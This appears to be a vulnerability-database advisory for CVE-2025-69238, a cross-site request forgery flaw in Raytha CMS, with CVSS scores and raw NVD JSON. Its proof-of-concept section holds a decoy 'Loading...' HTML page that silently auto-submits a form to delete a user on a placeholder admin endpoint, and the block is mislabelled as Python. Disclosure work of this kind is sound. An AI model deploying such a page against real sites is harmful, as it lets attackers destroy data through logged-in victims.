CVE-2025-69238

Description

Raytha CMS is vulnerable to Cross-Site Request Forgery across multiple endpoints. Attacker can craft special website, which when visited by the authenticated victim, will automatically send POST request to the endpoint (e. x. deletion of the data) without enforcing token verification. This issue was fixed in version 1.4.6.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:* - VULNERABLE

Raytha CMS < 1.4.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2025-69238 Raytha CMS -->
<!-- This PoC demonstrates automatic deletion of a user via CSRF attack -->
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Please wait, loading...</h1>
    <form id="csrfForm" action="https://target-site.com/admin/users/delete" method="POST" style="display:none;">
        <!-- Target user ID to be deleted -->
        <input type="hidden" name="id" value="2">
        <input type="hidden" name="_confirm" value="true">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.addEventListener('DOMContentLoaded', function() {
            document.getElementById('csrfForm').submit();
        });
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69238
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69238
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69238/
[4] VulDB https://vuldb.com/cve/CVE-2025-69238
[5] https://cert.pl/en/posts/2026/03/CVE-2025-69236
[6] https://raytha.com

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69238", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:00.827", "lastModified": "2026-03-16T19:31:41.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Raytha CMS is vulnerable to Cross-Site Request Forgery across multiple endpoints. Attacker can craft special website, which when visited by the authenticated victim, will automatically send POST request to the endpoint (e. x. deletion of the data) without enforcing token verification. \n\nThis issue was fixed in version 1.4.6."}, {"lang": "es", "value": "Raytha CMS es vulnerable a la falsificación de petición en sitios cruzados en múltiples puntos finales. El atacante puede crear un sitio web especial que, al ser visitado por la víctima autenticada, enviará automáticamente una petición POST al punto final (p. ej., eliminación de datos) sin aplicar la verificación de token.\n\nEste problema fue solucionado en la versión 1.4.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.6", "matchCriteriaId": "4A4FC7D6-F33F-4121-A375-B063263585FD"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2026/03/CVE-2025-69236", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://raytha.com", "source": "[email protected]", "tags": ["Product"]}]}}